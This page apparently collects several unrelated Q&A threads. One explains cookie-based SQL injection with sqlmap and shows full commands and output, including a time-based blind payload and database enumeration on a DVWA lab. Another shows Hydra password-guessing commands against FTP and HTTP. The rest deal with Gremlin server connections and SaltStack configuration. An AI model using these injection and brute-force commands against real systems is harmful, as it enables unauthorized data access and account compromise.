I need to do SQL injection on a part of cookie using sqlmap. The target URL is static.
A sample cookie:
Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../
In this cookie i need to inject the "userinput" using sqlmap. I know --cookie parameter but it wont work in this case. This is like part of cookie alone have to be injected using sqlmap.
I don't know how to do this. Please help.
i got the same problem to inject SQL in Cookie, I looked at its help and its code, now finally something made some sense, let me put my hypothesis:
Cookie base inject works with only level>=2.
You need to specify param-filter='COOKIE'.
Do not let sqlmap to try for URI injections when it asked for, or else it will fail by doing GET/POST based testing.
If you specify custom injection marker on that testable cookie do not proceed with that, or else it will fail.
I didn't try so many combinations on 3rd and 4th points, feel free to invalidate them. Okay so, try something like this:
sqlmap -u 'protocol://test.server/test_url/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
options necessary for cookie based testing are: -u, --cookie, -p, --param-filter, --level.
Command tried on SQLMap version: 1.4.8#stable
output:
$ sqlmap -u 'http://dvwa.local/vulnerabilities/sqli_blind/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
___
__H__
___ ___[']_____ ___ ___ {1.4.8#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 01:18:36 /2020-08-31/
[01:18:36] [WARNING] using '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir' as the output directory
[01:18:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site_com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[01:18:39] [INFO] testing connection to the target URL
[01:18:40] [INFO] testing if the target URL content is stable
[01:18:43] [INFO] target URL content is stable
do you want to URL encode cookie values (implementation specific)? [Y/n] y
[01:19:01] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[01:19:02] [INFO] testing for SQL injection on Cookie parameter 'id'
[01:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:19:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[01:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[01:19:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[01:19:17] [INFO] testing 'Generic inline queries'
[01:19:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[01:19:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[01:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:19:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:32] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:19:47] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[01:19:50] [INFO] testing 'MySQL inline queries'
[01:19:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:19:52] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:19:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:20:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[01:20:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[01:21:28] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] n
[01:23:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:23:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:23:47] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[01:24:08] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[01:24:08] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:24:27] [INFO] testing 'MySQL UNION query (65) - 21 to 40 columns'
[01:24:36] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high
---
[01:50:27] [INFO] the back-end DBMS is MySQL
[01:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:50:52] [INFO] fetching database names
[01:50:52] [INFO] fetching number of databases
[01:50:52] [INFO] retrieved: 2
[01:51:42] [INFO] retrieved: information_schema
[02:16:58] [INFO] retrieved: dvwa
available databases [2]:
[*] dvwa
[*] information_schema
[02:22:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 414 times
[02:22:32] [INFO] fetched data logged to text files under '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir/dvwa.local'
[*] ending # 02:22:32 /2020-08-31/
Intercept all request, save it to a file and then give that file to sqlmap with -r parameter, by default sqlmap should check cookie.
sqlmap.py -r request.txt
You can use tamper data (firefox extension), or free version of burp proxy to intercept request.
Try something like this:
sqlmap.py -u localhost/vulnerable --cookie="STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*"
This will test the parameter auth in the cookie:
sqlmap -u "website" --cookie='auth=blabla; uuid=blabla' -p auth --level=2
Level must be at least 2. This isn't the only way to specify the parameter to test, you can also use * to specify the injection point.
sqlmap -u "website" --cookie='auth=blabla; uuid=*' --level=2
Related
[21:07:29] [INFO] (custom) POST parameter 'JSON phone' appears to be 'MySQL AND time-based blind (ELT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
tips have time-based blind injectable,but I user "time-based blind" pattern can not find injectable.
I use command: "sqlmap -r /Users/yangzhuo/Downloads/sql1.txt --level=5 --risk=3 -vvv -random-agent --technique T -batch -dbs"
I have a local gremlin server running:
bin/gremlin.sh
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.codehaus.groovy.vmplugin.v7.Java7$1 (file:/Users/jwan/Downloads/apache-tinkerpop-gremlin-console-3.4.4/lib/groovy-2.5.7-indy.jar) to constructor java.lang.invoke.MethodHandles$Lookup(java.lang.Class,int)
WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.vmplugin.v7.Java7$1
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
plugin activated: tinkerpop.server
plugin activated: tinkerpop.utilities
plugin activated: tinkerpop.tinkergraph
But I'm also trying to connect to it using python:
from gremlin_python.structure.graph import Graph
from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
from os import environ
graph = Graph()
>>> graph_db = traversal().withGraph(graph).withRemote(DriverRemoteConnection(f'ws://localhost:3000/gremlin','g'))
I get a connection refused error. How do I connect to this locally?
That console session shows output from Gremlin Console not Gremlin Server. They are two totally different distributions. Download the Gremlin Server distribution here and start with bin/gremlin-server.sh. Your output should look like this after it has started:
[INFO] GremlinServer
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
[INFO] GremlinServer - Configuring Gremlin Server from conf/gremlin-server-modern.yaml
[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
[INFO] DefaultGraphManager - Graph [graph] was successfully configured via [conf/tinkergraph-empty.properties].
[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and preparing GremlinScriptEngines instances.
[INFO] ServerGremlinExecutor - Initialized gremlin-groovy GremlinScriptEngine and registered metrics
[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]
[INFO] OpLoader - Adding the standard OpProcessor.
[INFO] OpLoader - Adding the session OpProcessor.
[INFO] OpLoader - Adding the traversal OpProcessor.
[INFO] TraversalOpProcessor - Initialized cache for TraversalOpProcessor with size 1000 and expiration time of 600000 ms
[INFO] GremlinServer - Executing start up LifeCycleHook
[INFO] Logger$info - Loading 'modern' graph data.
[INFO] GremlinServer - idleConnectionTimeout was set to 0 which resolves to 0 seconds when configuring this value - this feature will be disabled
[INFO] GremlinServer - keepAliveInterval was set to 0 which resolves to 0 seconds when configuring this value - this feature will be disabled
[WARN] AbstractChannelizer - The org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0 serialization class is deprecated.
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v3.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0
[WARN] AbstractChannelizer - The org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0 serialization class is deprecated.
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v3.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v3.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0
[INFO] AbstractChannelizer - Configured application/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0
[INFO] AbstractChannelizer - Configured application/vnd.graphbinary-v1.0 with org.apache.tinkerpop.gremlin.driver.ser.GraphBinaryMessageSerializerV1
[INFO] AbstractChannelizer - Configured application/vnd.graphbinary-v1.0-stringd with org.apache.tinkerpop.gremlin.driver.ser.GraphBinaryMessageSerializerV1
[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 4 and boss thread pool of 1.
[INFO] GremlinServer$1 - Channel started at port 8182.
Problem
On a standalone minion, salt.states.pkgrepo.managed is being used to add a non standard software repo. The problem that's occurring, is that when a following sudo zypper update runs, the key has not been (auto) accepted by the system, preventing any packages from being updated or installed and thus the next state fails.
To reiterate with the exact state used mysuse.sls:
suse-gis-repo:
pkgrepo.managed:
- name: Application_Geo
- humanname: Applications related to the earth (GIS, Mapping, geodesy, GPS, astronomy) (openSUSE_Leap_42.1)
- baseurl: http://download.opensuse.org/repositories/Application:/Geo/openSUSE_Leap_42.1/
- gpgcheck: 1
- gpgkey: http://download.opensuse.org/repositories/Application:/Geo/openSUSE_Leap_42.1//repodata/repomd.xml.key
The problem is when the next phase of the state runs:
packages_uptodate:
pkg.uptodate:
- refresh: True
It fails because of required manual intervention shown below:
New repository or package signing key received:
Repository: Application_Geo
Key Name: Application:Geo OBS Project <Application:Geo#build.opensuse.org>
Key Fingerprint: 195E2111 06BC205D 2A9C2222 CC7F0748 9591C39B
Key Created: Thu 16 Jul 2015 08:01:27 PM CEST
Key Expires: Sat 23 Sep 2017 08:01:27 PM CEST
Rpm Name: gpg-pubkey-9591c39b-55a7f177
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r):
Attempts to Solve
Even if the last two lines of suse-gis-repo are commented out (ie. gpgchk & gpgkey), the problem described above still occurs.
zypper ar -G <URI> ensures the gpgkey is not checked but there is no option for this in the salt state.
One attempt to solve this problem, instead of using salt.states.pkgrepo.managed an attempt to use the corresponding execution module zypper.mod_repo was tried.
The example described in #3 is below:
package_autoaccept_key:
module.run:
- name: zypper.mod_repo
- kwargs: {
repo: 'Application_Geo',
baseurl: 'http://download.opensuse.org/repositories/Application:/Geo/openSUSE_Leap_42.1/',
enabled: 'True',
refresh: 'True',
gpgcheck: 'True',
gpgautoimport: 'True'
}
With the error:
local:
----------
ID: package_autoaccept_key
Function: module.run
Name: zypper.mod_repo
Result: False
Comment: Module function zypper.mod_repo is not available
Started: 02:18:34.108787
Duration: 543.087 ms
Changes:
Summary for local
------------
Succeeded: 0
Failed: 1
------------
Questions
Is there a way to accept the key (always trust) autonomously, either via state or execution modules?
Are execution modules able to run on standalone minions via the module.run function?
If they are able to run on standalone minions, what is the best way to be sure the required module is present?
Is the approach of using module.run in a state a flawed approach to the said problem and if so why?
Here is my /etc/salt/master config:
#GitFS
gitfs_provider: pygit2
gitfs_base: DEVELOPMENT
gitfs_env_whitelist:
- base
fileserver_backend:
- git
gitfs_remotes:
- ssh://git#github.com/myrepo/salt-states.git:
- pubkey: /root/.ssh/my.pub
- privkey: /root/.ssh/my
- mountpoint: salt:///srv/salt/salt-states
Here is my directory structure for the repo:
.
|-- README.md
|-- formulas
| `-- test
| |-- test.sls
`-- top.sls
Here is my very basic top.sls:
base:
'*':
- test
If i try to run highstate on my test node I get:
root#saltmaster:/etc/salt] salt -v '*' state.highstate
Executing job with jid 1234567890
-------------------------------------------
test-minion.domain:
----------
ID: states
Function: no.None
Result: False
Comment: No Top file or external nodes data matches found.
Started:
Duration:
Changes:
Summary for test-minion.domain
------------
Succeeded: 0
Failed: 1
------------
Total states run: 1
Total run time: 0.000 ms
I'm not sure why this isn't working and would appreciate any help with this. I've tried just applying the test.sls to see if it was the top file that was the issue but I got this:
root#saltmaster:/etc/salt] salt -v '*' state.sls test
Executing job with jid 1234567890
-------------------------------------------
test-minion.domain:
Data failed to compile:
----------
No matching sls found for 'test' in env 'base'
I had a similar problem, which was due to the cache being out of sync and not updating. If I tried to run:
salt-run fileserver.update
I got:
[WARNING ] Update lock file is present for gitfs remote 'git#github.com:mention-me/Salt.git', skipping. If this warning persists, it is possible that the update process was interrupted, but the lock could also have been manually set. Removing /var/cache/salt/master/gitfs/7d8d9790a933949777fd5a58284b8850/.git/update.lk or running 'salt-run cache.clear_git_lock gitfs type=update' will allow updates to continue for this remote.
Deleting the cache file specified, and running the above command fixed the problem.
I talked to the folks on the saltstack IRC and someone helped me fix the problem. It seems that adding a mountpoint was screwing everything up. Credit goes to:
12:20] == realname : Thomas Phipps
[12:20] == channels : #salt
[12:20] == server : orwell.freenode.net [NL]
[12:20] == : is using a secure connection
[12:20] == account : whytewolf
[12:20] == End of WHOIS
I'm trying to get the hang of hydra.
When I do this to test against my ftp site, it works. I'm hitting my own ftp site (ex. www.mysite.com) with the correct username and password (ex. username1 and password1):
./hydra -l username1 -p password1 -vV -f www.mysite.com ftp
Hydra v7.4.1 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-12-29 21:06:20
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target www.mysite.com - login "username1" - pass "password1" - 1 of 1 [child 0]
[21][ftp] host: 200.200.240.240 login: username1 password: password1
[STATUS] attack finished for www.mysite.com (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-12-29 21:06:21
However, when I do this to test a public basic authentication test page (http://browserspy.dk/password-ok.php) with the correct username and password (test and test), hydra just stops with a 'Resolving address ... done' message.
./hydra -l test -p test -vV -f browserspy.dk http-get /password-ok.php
Hydra v7.4.1 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-12-29 21:02:58
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
The hydra process just seems to die here and I'm returned to the command prompt.
What am I doing wrong?
You are not doing anything wrong, its a bug in hydra which affects the modes http-get, http-head and irc. Downgrade to v7.3 or wait for v7.5 which will fix this issue.